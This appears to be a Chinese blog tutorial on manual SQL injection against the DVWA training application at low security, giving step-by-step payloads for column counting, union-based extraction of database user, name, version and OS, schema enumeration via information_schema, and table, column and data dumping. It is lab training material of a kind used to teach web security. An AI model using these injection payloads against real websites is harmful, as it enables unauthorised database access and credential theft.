DVWA之php+mysql手工注入
dvwa安全级别为low,进入sql injection页面,提示输入user id,输入正确的id,将显示id first name,surname信息。
尝试输入"'",返回错误。存在注入点。
尝试遍历数据库表,提示输入的值为ID,初步判断为数字类型注入。尝试输入:1 or 1=1,尝试遍历数据库表。结果失败。
-
1 or 1=1遍历数据库表失败,猜测程序将此处看成了字符型,可尝试输入 1' or '1'='1 后遍历出数据库中所有内容。下面尝试结合各种不同语句,得到不同结果。
-
利用order by 语句查询,输入 1'order by 1 - - 页面显示正常,1'order by 2 - - 显示正常,1'order by 3 - - 报错,判断查询结果值为2列。(注意语句中- - 后边有空格,- -之间没有空格)
-
使用user(),database(),version()三个内置函数得到数据库的账户名,数据库名称,数据库版本信息,首先参数注入 1' and 1=2 union select 1,2 - -(- -之间无空格,- -后有空格)。得出first name处显示为查询结果第一列的值,surname处显示为查询结果第二列的值。
-
在得知显示之后,使用user(),database(),version(),语句 1' and 1=2 union select user(),database() - - 得到数据库用户以及数据库名称。链接数据库的用户为root@localhost,数据库名称为dvwa。
通过注入1' and 1=2 union select version(),database() - - 得到数据库版本为:5.0.90-community-nt。
通过注入:1'and 1=2 union select 1,@@global.version_compile_os from mysql.user –- 获得操作系统信息为win32.
-
通过注入: 1' and 1=2 union select 1,schema_name from information_schema.schemata - - 查询mysql数据库,所有数据库名字。这里利用了mysql默认数据库information_scehma,该数据库存储了mysql所有数据库和表的信息。
-
通过注入 1' and exists(select * from users) - - 猜解dvwa数据库中表名(该语句中表名为users,该表实际没有存放用户名和密码)
-
猜解字段名:1' and exists(select 字段名 from 表名) - - ,这里实际测试字段名first_name和last_name。实际语句 1' and exists(select first_name from users) - -以及1' and exists(select last_name from users) - - 猜解字段名。
爆出数据库中字段内容。 1' and 1=2 union select first_name,last_name from users - - 这里其实如果是存放管理员账户的表,那么用户名和密码就可以爆出了。
源代码
相关推荐:
以上就是DVWA之php+mysql手工注入的详细内容,更多请关注其它相关文章!